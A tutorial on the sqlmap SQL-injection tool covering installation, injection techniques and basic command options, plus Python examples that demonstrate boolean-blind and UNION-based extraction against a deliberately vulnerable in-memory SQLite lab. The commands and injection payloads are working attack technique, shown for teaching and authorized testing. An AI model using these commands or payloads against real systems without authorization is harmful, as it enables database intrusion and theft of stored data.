Quick Tutorial - Identify SQL Injection vulnerability with sqlmap

sqlmap is a Python-based penetration testing tool that automates the detection and exploitation of SQL injection flaws, up to and including taking over the back-end database server. It removes most of the manual effort of finding SQL injection in an application. This tutorial explains what sqlmap does and gets you ready to run your first SQL injection test with it.

Installation

sqlmap comes pre-installed on most penetration testing distributions such as Kali Linux and Parrot. On other Debian-based systems it can be installed from the package repositories:

 sudo apt-get install sqlmap 

sqlmap is written in Python, so a Python interpreter must be present. The packaged version pulls it in as a dependency; if you run sqlmap from a checkout of its source tree instead (the entry point is then sqlmap.py), install Python yourself:

sudo apt-get install python3

You can confirm that an interpreter is on the path by printing its version:

python3 -V

What does sqlmap do?

sqlmap automates the whole process of manually checking for SQL injection. It detects and exploits the six injection techniques listed below (the --technique option restricts a run to a subset of them):

  1. boolean-based blind
  2. UNION query-based
  3. time-based blind
  4. out-of-band
  5. error-based
  6. stacked queries
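To see what these techniques look like from the tester's side, here is an added example (not code from the original post or from the sqlmap project): a tiny in-memory SQLite application with a deliberately vulnerable lookup next to a parameterized one, the boolean-based blind check sqlmap runs first, character-by-character blind extraction, and a UNION query-based read. The database, table, names and secrets are all constructed for the example; sqlmap does the same kind of probing against real HTTP responses, with far more payloads and DBMS-specific syntax.

```python
import sqlite3

# Constructed target: an in-memory SQLite database standing in for the
# web application's back end. Names and secrets are made up.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "alice", "s3cr3t"), (2, "bob", "hunter2")])


def vulnerable_lookup(id_param: str) -> str:
    """Stand-in for index.php?id=...: the parameter is spliced into the SQL."""
    sql = f"SELECT name FROM users WHERE id = {id_param}"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"  # an error-based attack would read the DBMS message here
    return f"Hello {row[0]}" if row else "No such user"


def safe_lookup(id_param: str) -> str:
    """Hardened version: the value is bound as a parameter, never parsed as SQL."""
    try:
        row = conn.execute("SELECT name FROM users WHERE id = ?",
                           (int(id_param),)).fetchone()
    except ValueError:
        return "No such user"
    return f"Hello {row[0]}" if row else "No such user"


def is_boolean_blind(app, base: str) -> bool:
    """The core boolean-based check: a true and a false condition appended
    to the original value must produce different pages, and the original
    page must match the true case."""
    original = app(base)
    true_page = app(f"{base} AND 1=1")
    false_page = app(f"{base} AND 1=2")
    return original == true_page and true_page != false_page


def extract_blind(app, base: str, expr: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction: recover the value of an SQL
    expression one character at a time, using only the true/false page
    difference. Each character costs about seven requests (bisection over
    its ASCII code point), which is why this technique is slow."""
    true_page = app(f"{base} AND 1=1")
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{base} AND unicode(substr(({expr}),{pos},1)) > {mid}"
            if app(probe) == true_page:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: substr() is empty, unicode() NULL
            break
        result += chr(lo)
    return result


def union_based(app, base: str, expr: str) -> str:
    """UNION query-based: the page echoes a column of the result, so a
    UNION SELECT puts the wanted value into that column directly. The
    original row is suppressed with AND 1=2 so only the injected row shows."""
    return app(f"{base} AND 1=2 UNION SELECT ({expr})")


if __name__ == "__main__":
    secret = "SELECT secret FROM users WHERE name='bob'"
    print("vulnerable app boolean-blind:", is_boolean_blind(vulnerable_lookup, "1"))
    print("hardened app boolean-blind:  ", is_boolean_blind(safe_lookup, "1"))
    print("table via blind extraction:  ",
          extract_blind(vulnerable_lookup, "1",
                        "SELECT name FROM sqlite_master WHERE type='table'"))
    print("secret via blind extraction: ", extract_blind(vulnerable_lookup, "1", secret))
    print("secret via UNION:            ", union_based(vulnerable_lookup, "1", secret))
```

The remaining techniques reuse the same idea with a different signal: time-based blind runs the same bisection but reads true/false from a response delay instead of page content; error-based reads the value straight out of a DBMS error message when the application shows one; stacked queries need a driver and DBMS that execute several statements in one call (the sqlite3 module above deliberately runs only one); out-of-band makes the DBMS contact a host the tester controls (DNS or HTTP) and carries the data in that request.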

Supported DBMS by sqlmap

sqlmap fully supports the following database management systems:

MySQL, YugabyteDB, PostgreSQL, FrontBase, eXtremeDB, Mckoi, Virtuoso, Oracle, Raima Database Manager, Microsoft SQL Server, Microsoft Access, IBM DB2, Amazon Redshift, Apache Derby, MariaDB, Presto, TiDB, Vertica, InterSystems Cache, H2, SAP MaxDB, CockroachDB, Informix, Cubrid, Drizzle, HSQLDB, Altibase, Apache Ignite, CrateDB, Greenplum, Firebird, MimerSQL, SQLite, MemSQL, MonetDB, IRIS

How to use sqlmap tool effectively

sqlmap has a large number of options. This post lists the basic commands that are a good starting point for testing an application for SQL injection.

Examples

(1) First scan using -u option

You run sqlmap like any other command-line tool. The simplest test points it at a URL that carries a GET parameter; quote the URL so the shell does not interpret the ? and & characters:

sqlmap -u "http://testsite.com/index.php?id=1"

(2) Enumerate the databases with the --dbs option

Once an injectable parameter has been found, --dbs lists the databases on the server. (sqlmap.py is the entry point when running from a source checkout; the packaged command is simply sqlmap.)

sqlmap.py -u "http://www.testsite.com/test.php?id=87" --dbs

(3) Get help

sqlmap --help

(4) Change the User-Agent

By default sqlmap identifies itself in the User-Agent header, which simple filtering rules can block. The --random-agent option picks a browser User-Agent from sqlmap's built-in list instead. This is not a general firewall bypass: a WAF that inspects the injected payloads themselves is not fooled by a different User-Agent; for that, sqlmap provides --tamper scripts that rewrite payloads.

sqlmap -u "http://testsite.com/test.php?id=50" --random-agent

(5) Test the target with more payloads

The command below tests the application in more depth by sending many more SQL injection payloads. --level (1 to 5, default 1) controls how many checks and parameters are tested: from level 2 the Cookie header is tested, from level 3 the User-Agent and Referer headers too, and level 5 uses the full payload set. --risk (1 to 3, default 1) controls how intrusive the payloads are: risk 2 adds heavy time-based queries and risk 3 adds OR-based tests that can modify or delete data if the injection point sits in an UPDATE or DELETE statement, so use it with care on production systems.

sqlmap -u "https://testsite.com/index.php?web=aat" --risk=2 --level=5

(6) Test a POST request

sqlmap can also test POST requests. Suppose you want to test the username field of the application's login form. Intercept the login request with a proxy such as Burp Suite or ZAP, save the raw HTTP request (request line, headers, blank line, body) to a file named login.txt, and hand that file to sqlmap:

sqlmap -r /login.txt -p "username" --threads 10 --dbs

Here -r reads the request from the file, -p restricts testing to the named parameter (without it, sqlmap tests every parameter it finds), and --threads sets the number of concurrent requests (10 is the maximum). For a simple form you can skip the file and pass the body directly with --data, for example --data="username=admin&password=secret".
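The file that -r reads is a raw HTTP request exactly as an intercepting proxy saves it: request line, headers, an empty line, then the body, with CRLF line endings. The added example below (not from the original post or the sqlmap project; the request, host and credentials in it are constructed) parses such a file and lists the parameters sqlmap would consider at a given --level, which also illustrates the --level behaviour from example (5): GET and POST parameters at level 1, Cookie values from level 2, User-Agent and Referer from level 3. The write_request_file helper and the GET:/POST:/Cookie:/Header: labels are this example's own conventions, not sqlmap's, and only form-encoded bodies are parsed.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed login request, as Burp or ZAP would save it (CRLF line endings).
LOGIN_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: testsite.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://testsite.com/index.php?id=1\r\n"
    "Cookie: PHPSESSID=abc123; lang=en\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30\r\n"
    "\r\n"
    "username=admin&password=secret"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def candidate_parameters(raw: str, level: int = 1) -> dict:
    """Parameters sqlmap would test at the given --level, by location.
    Level 1: GET and POST parameters; level >= 2 adds Cookie values;
    level >= 3 adds the User-Agent and Referer headers."""
    req = parse_raw_request(raw)
    params = {}
    for name, value in parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True):
        params[f"GET:{name}"] = value
    if req["method"] == "POST" and req["body"]:
        # Assumes a form-encoded body; JSON or XML bodies need their own parser.
        for name, value in parse_qsl(req["body"], keep_blank_values=True):
            params[f"POST:{name}"] = value
    if level >= 2 and "cookie" in req["headers"]:
        for part in req["headers"]["cookie"].split(";"):
            name, _, value = part.strip().partition("=")
            params[f"Cookie:{name}"] = value
    if level >= 3:
        for header in ("user-agent", "referer"):
            if header in req["headers"]:
                params[f"Header:{header}"] = req["headers"][header]
    return params


def write_request_file(path: str, raw: str) -> None:
    """Save the request byte-for-byte for `sqlmap -r <path>` (hypothetical helper)."""
    with open(path, "wb") as fh:
        fh.write(raw.encode("latin-1"))


if __name__ == "__main__":
    for level in (1, 2, 3):
        print(f"--level {level}:", sorted(candidate_parameters(LOGIN_REQUEST, level)))
    write_request_file("login.txt", LOGIN_REQUEST)
```

Running it shows why -p "username" matters at the default level: without it, sqlmap would test the password field as well, and at level 2 or 3 the session cookie and the two headers on top, multiplying the request count.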

Conclusion

sqlmap is well maintained by the open-source community and is one of the most reliable tools for identifying SQL injection vulnerabilities in a web application. It supports a huge range of database systems and many kinds of enumeration beyond listing databases. If you have not used it yet, I highly recommend trying it against targets you are authorized to test.


If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purposes only. The individual is solely responsible for any illegal act.
